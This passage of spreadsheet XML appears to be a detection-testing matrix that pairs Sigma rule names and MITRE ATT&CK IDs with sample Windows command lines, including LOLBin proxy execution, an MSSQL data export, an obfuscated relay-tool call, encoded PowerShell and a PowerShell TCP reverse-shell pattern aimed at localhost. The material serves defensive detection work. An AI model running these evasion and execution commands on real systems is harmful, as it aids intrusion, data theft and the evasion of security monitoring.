    <row r="4611" ht="15.75" customHeight="1" s="42">
      <c r="A4611" s="44" t="n"/>
      <c r="B4611" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmiprvse_susp_child_processes</t>
        </is>
      </c>
      <c r="C4611" s="44" t="inlineStr">
        <is>
          <t>Suspicious WmiPrvSE Child Process</t>
        </is>
      </c>
      <c r="D4611" s="44" t="inlineStr">
        <is>
          <t>8a582fe2-0882-4b89-a82a-da6b2dc32937</t>
        </is>
      </c>
      <c r="E4611" s="44" t="n"/>
      <c r="F4611" s="44" t="n"/>
      <c r="G4611" s="44" t="n"/>
      <c r="H4611" s="44" t="n"/>
      <c r="I4611" s="44" t="n"/>
      <c r="J4611" s="44" t="n"/>
      <c r="K4611" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4612" ht="15.75" customHeight="1" s="42">
      <c r="A4612" s="44" t="n"/>
      <c r="B4612" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmiprvse_susp_child_processes</t>
        </is>
      </c>
      <c r="C4612" s="44" t="inlineStr">
        <is>
          <t>Suspicious WmiPrvSE Child Process</t>
        </is>
      </c>
      <c r="D4612" s="44" t="inlineStr">
        <is>
          <t>8a582fe2-0882-4b89-a82a-da6b2dc32937</t>
        </is>
      </c>
      <c r="E4612" s="44" t="n"/>
      <c r="F4612" s="44" t="n"/>
      <c r="G4612" s="44" t="n"/>
      <c r="H4612" s="44" t="n"/>
      <c r="I4612" s="44" t="n"/>
      <c r="J4612" s="44" t="n"/>
      <c r="K4612" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4613" ht="15.75" customHeight="1" s="42">
      <c r="A4613" s="44" t="n"/>
      <c r="B4613" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_susp_child_processes</t>
        </is>
      </c>
      <c r="C4613" s="44" t="inlineStr">
        <is>
          <t>Cscript/Wscript Potentially Suspicious Child Process</t>
        </is>
      </c>
      <c r="D4613" s="44" t="inlineStr">
        <is>
          <t>b6676963-0353-4f88-90f5-36c20d443c6a</t>
        </is>
      </c>
      <c r="E4613" s="44" t="n"/>
      <c r="F4613" s="44" t="n"/>
      <c r="G4613" s="44" t="n"/>
      <c r="H4613" s="44" t="n"/>
      <c r="I4613" s="44" t="n"/>
      <c r="J4613" s="44" t="n"/>
      <c r="K4613" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4614" ht="15.75" customHeight="1" s="42">
      <c r="A4614" s="44" t="n"/>
      <c r="B4614" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wusa_cab_files_extraction_from_susp_paths</t>
        </is>
      </c>
      <c r="C4614" s="44" t="inlineStr">
        <is>
          <t>Cab File Extraction Via Wusa.EXE From Potentially Suspicious Paths</t>
        </is>
      </c>
      <c r="D4614" s="44" t="inlineStr">
        <is>
          <t>c74c0390-3e20-41fd-a69a-128f0275a5ea</t>
        </is>
      </c>
      <c r="E4614" s="44" t="n"/>
      <c r="F4614" s="44" t="n"/>
      <c r="G4614" s="44" t="n"/>
      <c r="H4614" s="44" t="n"/>
      <c r="I4614" s="44" t="n"/>
      <c r="J4614" s="44" t="n"/>
      <c r="K4614" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4615" ht="15.75" customHeight="1" s="42">
      <c r="A4615" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4615" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pcwrun_follina</t>
        </is>
      </c>
      <c r="C4615" s="44" t="inlineStr">
        <is>
          <t>Execute Pcwrun.EXE To Leverage Follina</t>
        </is>
      </c>
      <c r="D4615" s="44" t="inlineStr">
        <is>
          <t>6004abd0-afa4-4557-ba90-49d172e0a299</t>
        </is>
      </c>
      <c r="E4615" s="44" t="inlineStr">
        <is>
          <t>pcwrun.exe .."/".."/"Windows\System32\calc.exe</t>
        </is>
      </c>
      <c r="F4615" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4615" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4615" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I4615" s="44" t="n"/>
      <c r="J4615" s="44" t="n"/>
      <c r="K4615" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4616" ht="15.75" customHeight="1" s="42">
      <c r="A4616" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4616" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_sftp</t>
        </is>
      </c>
      <c r="C4616" s="44" t="inlineStr">
        <is>
          <t>Use Of The SFTP.EXE Binary As A LOLBIN</t>
        </is>
      </c>
      <c r="D4616" s="44" t="inlineStr">
        <is>
          <t>a85ffc3a-e8fd-4040-93bf-78aff284d801</t>
        </is>
      </c>
      <c r="E4616" s="44" t="inlineStr">
        <is>
          <t>sftp.exe -D C:/Windows/System32/calc.exe user@host</t>
        </is>
      </c>
      <c r="F4616" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4616" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4616" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I4616" s="44" t="n"/>
      <c r="J4616" s="44" t="n"/>
      <c r="K4616" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4617" ht="15.75" customHeight="1" s="42">
      <c r="A4617" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4617" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_ms_appinstaller_download</t>
        </is>
      </c>
      <c r="C4617" s="44" t="inlineStr">
        <is>
          <t>Potential File Download Via MS-AppInstaller Protocol Handler</t>
        </is>
      </c>
      <c r="D4617" s="44" t="inlineStr">
        <is>
          <t>180c7c5c-d64b-4a63-86e9-68910451bc8b</t>
        </is>
      </c>
      <c r="E4617" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "start ms-appinstaller://?"source"=http://example.com/package.appinstaller"</t>
        </is>
      </c>
      <c r="F4617" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4617" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4617" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I4617" s="44" t="n"/>
      <c r="J4617" s="44" t="n"/>
      <c r="K4617" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4618" ht="15.75" customHeight="1" s="42">
      <c r="A4618" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4618" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wuauclt_dll_loading</t>
        </is>
      </c>
      <c r="C4618" s="44" t="inlineStr">
        <is>
          <t>Proxy Execution Via Wuauclt.EXE</t>
        </is>
      </c>
      <c r="D4618" s="44" t="inlineStr">
        <is>
          <t>af77cf95-c469-471c-b6a0-946c685c4798</t>
        </is>
      </c>
      <c r="E4618" s="44" t="inlineStr">
        <is>
          <t>wuauclt.exe /UpdateDeploymentProvider UpdateDeploymentProvider.dll  /RunHandlerComServer</t>
        </is>
      </c>
      <c r="F4618" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4618" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4618" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I4618" s="44" t="n"/>
      <c r="J4618" s="44" t="n"/>
      <c r="K4618" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4619" ht="15.75" customHeight="1" s="42">
      <c r="A4619" s="44" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B4619" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_bcp_export_data</t>
        </is>
      </c>
      <c r="C4619" s="44" t="inlineStr">
        <is>
          <t>Data Export From MSSQL Table Via BCP.EXE</t>
        </is>
      </c>
      <c r="D4619" s="44" t="inlineStr">
        <is>
          <t>c615d676-f655-46b9-b913-78729021e5d7</t>
        </is>
      </c>
      <c r="E4619" s="44" t="inlineStr">
        <is>
          <t>C:\Tools\bcp.exe TestDB.dbo.TestTable "out" C:\Temp\test.txt -c -T</t>
        </is>
      </c>
      <c r="F4619" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4619" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4619" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I4619" s="44" t="n"/>
      <c r="J4619" s="44" t="n"/>
      <c r="K4619" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4620" ht="15.75" customHeight="1" s="42">
      <c r="A4620" s="44" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B4620" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_bcp_export_data</t>
        </is>
      </c>
      <c r="C4620" s="44" t="inlineStr">
        <is>
          <t>Data Export From MSSQL Table Via BCP.EXE</t>
        </is>
      </c>
      <c r="D4620" s="44" t="inlineStr">
        <is>
          <t>c615d676-f655-46b9-b913-78729021e5d7</t>
        </is>
      </c>
      <c r="E4620" s="44" t="inlineStr">
        <is>
          <t>C:\Tools\bcp.exe TestDB.dbo.TestTable	out	C:\Temp\test.txt -c -T</t>
        </is>
      </c>
      <c r="F4620" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4620" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4620" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I4620" s="44" t="n"/>
      <c r="J4620" s="44" t="n"/>
      <c r="K4620" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4621" ht="15.75" customHeight="1" s="42">
      <c r="A4621" s="44" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B4621" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_bcp_export_data</t>
        </is>
      </c>
      <c r="C4621" s="44" t="inlineStr">
        <is>
          <t>Data Export From MSSQL Table Via BCP.EXE</t>
        </is>
      </c>
      <c r="D4621" s="44" t="inlineStr">
        <is>
          <t>c615d676-f655-46b9-b913-78729021e5d7</t>
        </is>
      </c>
      <c r="E4621" s="44" t="inlineStr">
        <is>
          <t>C:\Tools\bcp.exe TestDB.dbo.TestTable out	C:\Temp\test.txt -c -T</t>
        </is>
      </c>
      <c r="F4621" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4621" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4621" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I4621" s="44" t="n"/>
      <c r="J4621" s="44" t="n"/>
      <c r="K4621" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4622" ht="15.75" customHeight="1" s="42">
      <c r="A4622" s="44" t="inlineStr">
        <is>
          <t>t1574.001</t>
        </is>
      </c>
      <c r="B4622" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_task_folder_evasion</t>
        </is>
      </c>
      <c r="C4622" s="44" t="inlineStr">
        <is>
          <t>Tasks Folder Evasion</t>
        </is>
      </c>
      <c r="D4622" s="44" t="inlineStr">
        <is>
          <t>cc4e02ba-9c06-48e2-b09e-2500cace9ae0</t>
        </is>
      </c>
      <c r="E4622" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c e^cho. &gt; C:\Windows\System32\Tasks\test.txt</t>
        </is>
      </c>
      <c r="F4622" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4622" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4622" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I4622" s="44" t="n"/>
      <c r="J4622" s="44" t="n"/>
      <c r="K4622" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4623" ht="15.75" customHeight="1" s="42">
      <c r="A4623" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4623" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_symlinkevaluation</t>
        </is>
      </c>
      <c r="C4623" s="44" t="inlineStr">
        <is>
          <t>Fsutil Behavior Set SymlinkEvaluation</t>
        </is>
      </c>
      <c r="D4623" s="44" t="inlineStr">
        <is>
          <t>c0b2768a-dd06-4671-8339-b16ca8d1f27f</t>
        </is>
      </c>
      <c r="E4623" s="44" t="inlineStr">
        <is>
          <t>fsutil behavior	set	SymlinkEvaluation	R2L:1</t>
        </is>
      </c>
      <c r="F4623" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4623" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4623" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I4623" s="44" t="n"/>
      <c r="J4623" s="44" t="n"/>
      <c r="K4623" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4624" ht="15.75" customHeight="1" s="42">
      <c r="A4624" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4624" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sliver_c2_execution_pattern</t>
        </is>
      </c>
      <c r="C4624" s="44" t="inlineStr">
        <is>
          <t>HackTool - Sliver C2 Implant Activity Pattern</t>
        </is>
      </c>
      <c r="D4624" s="44" t="inlineStr">
        <is>
          <t>42333b2c-b425-441c-b70e-99404a17170f</t>
        </is>
      </c>
      <c r="E4624" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -NonInteractive -NoExit -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8"</t>
        </is>
      </c>
      <c r="F4624" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4624" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4624" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I4624" s="44" t="n"/>
      <c r="J4624" s="44" t="n"/>
      <c r="K4624" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4625" ht="15.75" customHeight="1" s="42">
      <c r="A4625" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4625" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sliver_c2_execution_pattern</t>
        </is>
      </c>
      <c r="C4625" s="44" t="inlineStr">
        <is>
          <t>HackTool - Sliver C2 Implant Activity Pattern</t>
        </is>
      </c>
      <c r="D4625" s="44" t="inlineStr">
        <is>
          <t>42333b2c-b425-441c-b70e-99404a17170f</t>
        </is>
      </c>
      <c r="E4625" s="44" t="inlineStr">
        <is>
          <t>powershell.exe  -NoExit  -Command  [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8</t>
        </is>
      </c>
      <c r="F4625" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4625" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4625" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I4625" s="44" t="n"/>
      <c r="J4625" s="44" t="n"/>
      <c r="K4625" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4626" ht="15.75" customHeight="1" s="42">
      <c r="A4626" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4626" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sliver_c2_execution_pattern</t>
        </is>
      </c>
      <c r="C4626" s="44" t="inlineStr">
        <is>
          <t>HackTool - Sliver C2 Implant Activity Pattern</t>
        </is>
      </c>
      <c r="D4626" s="44" t="inlineStr">
        <is>
          <t>42333b2c-b425-441c-b70e-99404a17170f</t>
        </is>
      </c>
      <c r="E4626" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NoExit -Command "[Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8"</t>
        </is>
      </c>
      <c r="F4626" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4626" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4626" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I4626" s="44" t="n"/>
      <c r="J4626" s="44" t="n"/>
      <c r="K4626" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4627" ht="15.75" customHeight="1" s="42">
      <c r="A4627" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4627" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sliver_c2_execution_pattern</t>
        </is>
      </c>
      <c r="C4627" s="44" t="inlineStr">
        <is>
          <t>HackTool - Sliver C2 Implant Activity Pattern</t>
        </is>
      </c>
      <c r="D4627" s="44" t="inlineStr">
        <is>
          <t>42333b2c-b425-441c-b70e-99404a17170f</t>
        </is>
      </c>
      <c r="E4627" s="44" t="inlineStr">
        <is>
          <t>powershell.exe	-NoExit	-Command	[Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8</t>
        </is>
      </c>
      <c r="F4627" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4627" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4627" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I4627" s="44" t="n"/>
      <c r="J4627" s="44" t="n"/>
      <c r="K4627" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4628" ht="15.75" customHeight="1" s="42">
      <c r="A4628" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4628" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sliver_c2_execution_pattern</t>
        </is>
      </c>
      <c r="C4628" s="44" t="inlineStr">
        <is>
          <t>HackTool - Sliver C2 Implant Activity Pattern</t>
        </is>
      </c>
      <c r="D4628" s="44" t="inlineStr">
        <is>
          <t>42333b2c-b425-441c-b70e-99404a17170f</t>
        </is>
      </c>
      <c r="E4628" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NoE -c "[Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8"</t>
        </is>
      </c>
      <c r="F4628" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4628" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4628" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I4628" s="44" t="n"/>
      <c r="J4628" s="44" t="n"/>
      <c r="K4628" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4629" ht="15.75" customHeight="1" s="42">
      <c r="A4629" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4629" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_perl_inline_command_execution</t>
        </is>
      </c>
      <c r="C4629" s="44" t="inlineStr">
        <is>
          <t>Perl Inline Command Execution</t>
        </is>
      </c>
      <c r="D4629" s="44" t="inlineStr">
        <is>
          <t>f426547a-e0f7-441a-b63e-854ac5bdf54d</t>
        </is>
      </c>
      <c r="E4629" s="44" t="inlineStr">
        <is>
          <t>C:\Strawberry\perl\bin\perl.exe	-e "print 'TEST-HOST'"</t>
        </is>
      </c>
      <c r="F4629" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4629" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4629" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I4629" s="44" t="n"/>
      <c r="J4629" s="44" t="n"/>
      <c r="K4629" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4630" ht="15.75" customHeight="1" s="42">
      <c r="A4630" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4630" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_local_install_via_manifest</t>
        </is>
      </c>
      <c r="C4630" s="44" t="inlineStr">
        <is>
          <t>Install New Package Via Winget Local Manifest</t>
        </is>
      </c>
      <c r="D4630" s="44" t="inlineStr">
        <is>
          <t>313d6012-51a0-4d93-8dfc-de8553239e25</t>
        </is>
      </c>
      <c r="E4630" s="44" t="inlineStr">
        <is>
          <t>winget install -m"C:\Temp\test.yaml"</t>
        </is>
      </c>
      <c r="F4630" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4630" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4630" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I4630" s="44" t="n"/>
      <c r="J4630" s="44" t="n"/>
      <c r="K4630" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4631" ht="15.75" customHeight="1" s="42">
      <c r="A4631" s="44" t="inlineStr">
        <is>
          <t>t1557.001</t>
        </is>
      </c>
      <c r="B4631" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_relay_attacks_tools</t>
        </is>
      </c>
      <c r="C4631" s="44" t="inlineStr">
        <is>
          <t>Potential SMB Relay Attack Tool Execution</t>
        </is>
      </c>
      <c r="D4631" s="44" t="inlineStr">
        <is>
          <t>5589ab4f-a767-433c-961d-c91f3f704db1</t>
        </is>
      </c>
      <c r="E4631" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; {Invoke-T''ater}"</t>
        </is>
      </c>
      <c r="F4631" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4631" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4631" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I4631" s="44" t="n"/>
      <c r="J4631" s="44" t="n"/>
      <c r="K4631" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4632" ht="15.75" customHeight="1" s="42">
      <c r="A4632" s="44" t="inlineStr">
        <is>
          <t>t1021.003</t>
        </is>
      </c>
      <c r="B4632" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mmc_mmc20_lateral_movement</t>
        </is>
      </c>
      <c r="C4632" s="44" t="inlineStr">
        <is>
          <t>MMC20 Lateral Movement</t>
        </is>
      </c>
      <c r="D4632" s="44" t="inlineStr">
        <is>
          <t>f1f3bf22-deb2-418d-8cce-e1a45e46a5bd</t>
        </is>
      </c>
      <c r="E4632" s="44" t="inlineStr">
        <is>
          <t>C:\WINDOWS\system32\mmc.exe /Embedding</t>
        </is>
      </c>
      <c r="F4632" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4632" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4632" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I4632" s="44" t="n"/>
      <c r="J4632" s="44" t="n"/>
      <c r="K4632" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4633" ht="15.75" customHeight="1" s="42">
      <c r="A4633" s="44" t="inlineStr">
        <is>
          <t>t1021.003</t>
        </is>
      </c>
      <c r="B4633" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mmc_mmc20_lateral_movement</t>
        </is>
      </c>
      <c r="C4633" s="44" t="inlineStr">
        <is>
          <t>MMC20 Lateral Movement</t>
        </is>
      </c>
      <c r="D4633" s="44" t="inlineStr">
        <is>
          <t>f1f3bf22-deb2-418d-8cce-e1a45e46a5bd</t>
        </is>
      </c>
      <c r="E4633" s="44" t="inlineStr">
        <is>
          <t>C:\WINDOWS\system32\mmc.exe "-Embedding"</t>
        </is>
      </c>
      <c r="F4633" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4633" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4633" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I4633" s="44" t="n"/>
      <c r="J4633" s="44" t="n"/>
      <c r="K4633" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4634" ht="15.75" customHeight="1" s="42">
      <c r="A4634" s="44" t="inlineStr">
        <is>
          <t>t1021.003</t>
        </is>
      </c>
      <c r="B4634" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mmc_mmc20_lateral_movement</t>
        </is>
      </c>
      <c r="C4634" s="44" t="inlineStr">
        <is>
          <t>MMC20 Lateral Movement</t>
        </is>
      </c>
      <c r="D4634" s="44" t="inlineStr">
        <is>
          <t>f1f3bf22-deb2-418d-8cce-e1a45e46a5bd</t>
        </is>
      </c>
      <c r="E4634" s="44" t="inlineStr">
        <is>
          <t>C:\WINDOWS\system32\mmc.exe   -Embedding</t>
        </is>
      </c>
      <c r="F4634" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4634" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4634" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I4634" s="44" t="n"/>
      <c r="J4634" s="44" t="n"/>
      <c r="K4634" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4635" ht="15.75" customHeight="1" s="42">
      <c r="A4635" s="44" t="inlineStr">
        <is>
          <t>t1021.003</t>
        </is>
      </c>
      <c r="B4635" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mmc_mmc20_lateral_movement</t>
        </is>
      </c>
      <c r="C4635" s="44" t="inlineStr">
        <is>
          <t>MMC20 Lateral Movement</t>
        </is>
      </c>
      <c r="D4635" s="44" t="inlineStr">
        <is>
          <t>f1f3bf22-deb2-418d-8cce-e1a45e46a5bd</t>
        </is>
      </c>
      <c r="E4635" s="44" t="inlineStr">
        <is>
          <t>C:\WINDOWS\system32\mmc.exe -Embedding:Extra</t>
        </is>
      </c>
      <c r="F4635" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4635" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4635" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I4635" s="44" t="n"/>
      <c r="J4635" s="44" t="n"/>
      <c r="K4635" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4636" ht="15.75" customHeight="1" s="42">
      <c r="A4636" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4636" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_encoded_cmd</t>
        </is>
      </c>
      <c r="C4636" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line</t>
        </is>
      </c>
      <c r="D4636" s="44" t="inlineStr">
        <is>
          <t>ca2092a1-c273-4878-9b4b-0d60115bf5ea</t>
        </is>
      </c>
      <c r="E4636" s="44" t="inlineStr">
        <is>
          <t>powershell.exe --encodedcommand SQBFAFgA</t>
        </is>
      </c>
      <c r="F4636" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4636" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4636" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I4636" s="44" t="n"/>
      <c r="J4636" s="44" t="n"/>
      <c r="K4636" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4637" ht="15.75" customHeight="1" s="42">
      <c r="A4637" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4637" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_reverse_shell_connection</t>
        </is>
      </c>
      <c r="C4637" s="44" t="inlineStr">
        <is>
          <t>Potential Powershell ReverseShell Connection</t>
        </is>
      </c>
      <c r="D4637" s="44" t="inlineStr">
        <is>
          <t>edc2f8ae-2412-4dfd-b9d5-0c57727e70be</t>
        </is>
      </c>
      <c r="E4637" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NoExit -Command "&amp; {$tcpClient = New-Object System.Net.Sockets.TCPClient; $tcpClient.Connect('127.0.0.1', 8080); $stream = $tcpClient.GetStream(); $stream.Write([System.Text.Encoding]::ASCII.GetBytes('Hello'), 0, 5)}"</t>
        </is>
      </c>
      <c r="F4637" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4637" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4637" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I4637" s="44" t="n"/>
      <c r="J4637" s="44" t="n"/>
      <c r="K4637" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4638" ht="15.75" customHeight="1" s="42">
      <c r="A4638" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4638" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_parent_process</t>
        </is>
      </c>
      <c r="C4638" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parent Process</t>
        </is>
      </c>
      <c r="D4638" s="44" t="inlineStr">
        <is>
          <t>754ed792-634f-40ae-b3bc-e0448d33f695</t>
        </is>
      </c>
      <c r="E4638" s="44" t="inlineStr">
        <is>
          <t>C:\\WINDOWS\\system32\\cmd.exe /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\\art-marker.txt</t>
        </is>
      </c>
      <c r="F4638" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4638" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4638" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I4638" s="44" t="n"/>
      <c r="J4638" s="44" t="n"/>
      <c r="K4638" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4639" ht="15.75" customHeight="1" s="42">
      <c r="A4639" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4639" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_parent_process</t>
        </is>
      </c>
      <c r="C4639" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parent Process</t>
        </is>
      </c>
      <c r="D4639" s="44" t="inlineStr">
        <is>
          <t>754ed792-634f-40ae-b3bc-e0448d33f695</t>
        </is>
      </c>
      <c r="E4639" s="44" t="inlineStr">
        <is>
          <t>C:\\WINDOWS\\system32\\cmd.exe /c "powershell.exe" -nop -w hidden -command New-Item -ItemType File C:\\art-marker.txt</t>
        </is>
      </c>
      <c r="F4639" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4639" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4639" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I4639" s="44" t="n"/>
      <c r="J4639" s="44" t="n"/>
      <c r="K4639" s="44" t="b">
        <v>1</v>
      </c>
    </row>
